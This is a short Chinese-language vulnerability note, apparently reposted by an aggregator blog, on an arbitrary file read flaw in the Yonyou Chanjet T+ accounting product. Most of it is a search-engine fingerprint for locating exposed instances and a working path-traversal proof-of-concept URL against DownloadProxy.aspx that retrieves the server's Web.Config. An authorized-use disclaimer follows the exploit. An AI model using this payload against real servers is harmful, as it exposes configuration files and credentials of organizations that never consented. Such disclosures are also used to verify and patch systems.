漏洞描述

用友?暢捷通T+ DownloadProxy.aspx文件存在任意文件讀取漏洞，攻擊者通過漏洞可以獲取服務器上的敏感文件

漏洞影響

用友?暢捷通T+

網絡測繪

app="暢捷通-TPlus"

?

漏洞復現

登錄頁面

驗證POC?

/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

?

技術文章僅供參考，此文所提供的信息只為網絡安全人員對自己所負責的網站、服務器等（包括但不限于）進行檢測或維護參考，未經授權請勿利用文章中的技術資料對任何計算機系統進行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失，均由使用者本人負責。本文所提供的工具僅用于學習，禁止用于其他！！！
?

總結

以上是生活随笔為你收集整理的用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。